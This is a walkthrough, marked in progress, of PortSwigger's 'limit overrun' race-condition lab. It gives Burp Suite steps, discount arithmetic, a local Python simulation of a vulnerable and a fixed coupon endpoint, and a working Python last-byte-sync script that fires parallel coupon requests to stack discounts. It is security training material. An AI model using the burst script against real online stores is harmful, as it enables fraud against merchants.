IN PROGRESS: WebSecurityAcademy (PortSwigger) – Race conditions

Walk-through of the Race conditions labs on PortSwigger Web Security Academy.

Apprentice – Limit overrun race conditions

This lab’s purchasing flow contains a race condition that enables you to purchase items for an unintended price. To solve the lab, successfully purchase a Lightweight L33t Leather Jacket. You can log in to your account with the following credentials: wiener:peter.

There is a banner at the top of the page with promo code “PROMO20” for 20% off.

  • Click on My account and log in with credentials wiener/peter.
  • On the Home page, click on View details under the lightweight leather jacket.
  • Click Add to cart.
  • Click on the cart.
  • Apply coupon code “PROMO20”, then try applying it a second time. The second attempt is rejected: the server checks whether the code is already on the cart before it records it, and that check is what the race will bypass.
  • Remove the coupon.
  • Intercept request in Burp Suite.
  • Add coupon code “PROMO20” and click Apply. Do NOT forward the request. Send it to the Repeater module instead.
  • From the Repeater, right-click on the request and click Add tab to group -> Create tab group. Choose a name like “Race condition”.
POST /cart/coupon HTTP/2
Host: <LAB ID>.web-security-academy.net
[...]

csrf=kjCPAxxK9QDRPoFjczfK2eqTtzfI6tSV&coupon=PROMO20

The jacket costs $1337 but the account only has $50 of store credit. PROMO20 takes 20% off the running total, so each application that lands multiplies the price by 0.8; if the “already applied” check can be beaten, the discounts stack:

  • Coupon 1: $1337 x 0.8 = $1069.60
  • Coupon 2: $1069.60 x 0.8 = $855.68
  • Coupon 3: $855.68 x 0.8 = $684.54
  • Coupon 4: $684.54 x 0.8 = $547.64
  • Coupon 5: $547.64 x 0.8 = $438.11
  • Coupon 6: $438.11 x 0.8 = $350.49
  • Coupon 7: $350.49 x 0.8 = $280.39
  • Coupon 8: $280.39 x 0.8 = $224.31
  • Coupon 9: $224.31 x 0.8 = $179.45
  • Coupon 10: $179.45 x 0.8 = $143.56
  • Coupon 11: $143.56 x 0.8 = $114.85
  • Coupon 12: $114.85 x 0.8 = $91.88
  • Coupon 13: $91.88 x 0.8 = $73.50
  • Coupon 14: $73.50 x 0.8 = $58.80
  • Coupon 15: $58.80 x 0.8 = $47.04

So the coupon has to land at least 15 times: that brings the total to $47.04, just under the $50 credit (14 applications, $58.80, is not enough).
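Why sending the requests together beats the check, as an added Python example (not part of the original walkthrough or of the lab's code): the model below is an assumed reconstruction of the coupon endpoint as a check (“is PROMO20 already on the cart?”) followed by a write, with a constructed delay standing in for the server's database round trip. Twenty calls released from a barrier all pass the check before any of them writes, which is the limit overrun; the fixed variant wraps check and write in one critical section and lets exactly one through. It also reproduces the price table above (intermediate values unrounded, final figure rounded to cents).

```python
import threading
import time
from decimal import Decimal, ROUND_HALF_UP

JACKET_PRICE = Decimal("1337")
COUPON_FACTOR = Decimal("0.8")   # PROMO20: 20% off the running total


def price_after(applications: int) -> Decimal:
    """Jacket price after PROMO20 has landed `applications` times.

    Intermediate values are not rounded (that is how the table above was
    produced); only the final figure is rounded to cents.
    """
    exact = JACKET_PRICE * COUPON_FACTOR ** applications
    return exact.quantize(Decimal("0.01"), rounding=ROUND_HALF_UP)


def applications_needed(credit: Decimal) -> int:
    """Smallest number of coupon applications that brings the price to `credit` or below."""
    n = 0
    while price_after(n) > credit:
        n += 1
    return n


class VulnerableCart:
    """Assumed model of the lab's coupon endpoint: a check ('is the code already on
    the cart?') followed, after some server-side work, by the write that records it.
    Nothing makes the two steps atomic, so requests that arrive together all pass
    the check before any of them writes."""

    def __init__(self):
        self.coupons = []                # a list, so duplicate applications stay visible

    def apply_coupon(self, code: str) -> str:
        if code in self.coupons:         # check
            return "already applied"
        time.sleep(0.01)                 # constructed delay standing in for the DB round trip
        self.coupons.append(code)        # act
        return "applied"


class FixedCart(VulnerableCart):
    """Same logic with check and write inside one critical section. In a real
    application that would be a DB transaction or a unique constraint on (cart, coupon)."""

    def __init__(self):
        super().__init__()
        self._lock = threading.Lock()

    def apply_coupon(self, code: str) -> str:
        with self._lock:
            return super().apply_coupon(code)


def race(cart, code: str = "PROMO20", n: int = 20):
    """Release n apply_coupon calls at the same instant (the 'Send group in parallel'
    step) and return (number that succeeded, number of times the code was stored)."""
    barrier = threading.Barrier(n)
    results = []

    def worker():
        barrier.wait()
        results.append(cart.apply_coupon(code))

    threads = [threading.Thread(target=worker) for _ in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results.count("applied"), cart.coupons.count(code)


if __name__ == "__main__":
    print("applications needed for $50 credit:", applications_needed(Decimal("50")))
    print("vulnerable cart (applied, stored):", race(VulnerableCart()))
    print("fixed cart      (applied, stored):", race(FixedCart()))
```

The vulnerable cart normally stores the code all 20 times; the exact count depends on scheduling, which is also why the Burp attack sometimes needs more copies of the request than the arithmetic says.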

  • Right-click the Repeater tab and choose Duplicate tab; repeat until the tab group holds at least 15 copies of the coupon request (duplicated tabs stay in the same group).
  • Select the tab group, click the arrow beside Send and select Send group in parallel (single-packet attack).
  • Click on Send group (parallel).
  • Refresh the cart and check the order total. Not every request in the burst lands inside the window between the server's check and its write, so some responses will report the coupon as already applied and the discount may have been applied fewer than 15 times. If the order total is still higher than your remaining store credit, remove the discount codes and repeat the attack; adding more copies of the request (try 20) raises the odds that 15 of them get through. Once the order total is below your remaining store credit, purchase the jacket to solve the lab.
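The same burst scripted outside Burp, as an added Python example (not part of the original walkthrough): every connection sends the whole request except its final byte, then all threads release that last byte from a barrier so the requests complete as close together as the network allows. This is the classic multi-connection last-byte technique, less precise than Burp's single-packet attack, so expect to rerun it; remove the coupon from the cart before each run, as in the steps above. The lab host, session cookie and CSRF token are placeholders to be copied from the intercepted request, and the script assumes the endpoint accepts HTTP/1.1 (Burp showed it over HTTP/2).

```python
import http.client
import threading
from urllib.parse import urlencode

# Assumed placeholders: copy the real values from the intercepted POST /cart/coupon in Burp.
LAB_HOST = "YOUR-LAB-ID.web-security-academy.net"
SESSION_COOKIE = "YOUR-SESSION-COOKIE-VALUE"
CSRF_TOKEN = "YOUR-CSRF-TOKEN"


def build_coupon_body(csrf: str, coupon: str = "PROMO20") -> bytes:
    """Form body of the coupon request: the same two fields Burp shows."""
    return urlencode({"csrf": csrf, "coupon": coupon}).encode()


def send_burst(host: str, session: str, csrf: str, n: int = 20, coupon: str = "PROMO20"):
    """Open n connections, send each request except its final byte, then release all
    the final bytes from a barrier. Returns a list of (status, first 80 bytes of body)."""
    body = build_coupon_body(csrf, coupon)
    barrier = threading.Barrier(n)
    results = [None] * n

    def worker(i: int):
        try:
            conn = http.client.HTTPSConnection(host, timeout=15)
            conn.putrequest("POST", "/cart/coupon")   # putrequest adds the Host header itself
            conn.putheader("Cookie", f"session={session}")
            conn.putheader("Content-Type", "application/x-www-form-urlencoded")
            conn.putheader("Content-Length", str(len(body)))
            conn.endheaders()
            conn.send(body[:-1])                       # everything but the last byte
            barrier.wait(timeout=10)                   # all threads pause here...
            conn.send(body[-1:])                       # ...and complete together
            resp = conn.getresponse()
            results[i] = (resp.status, resp.read(80))
            conn.close()
        except Exception as exc:                       # includes a broken barrier
            results[i] = ("error", repr(exc).encode())

    threads = [threading.Thread(target=worker, args=(i,)) for i in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results


def summarize(results) -> dict:
    """Count outcomes by status so repeated runs are easy to compare."""
    counts = {}
    for status, _ in results:
        counts[status] = counts.get(status, 0) + 1
    return counts


if __name__ == "__main__":
    outcomes = send_burst(LAB_HOST, SESSION_COOKIE, CSRF_TOKEN)
    for status, snippet in outcomes:
        print(status, snippet)
    print(summarize(outcomes))
```

The status counts alone do not tell you how many coupons landed; refresh the cart and read the total, exactly as in the Burp version.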

Practitioner – Bypassing rate limits via race conditions

Practitioner – Multi-endpoint race conditions

Practitioner – Single-endpoint race conditions

Practitioner – Exploiting time-sensitive vulnerabilities

Expert – Partial construction race conditions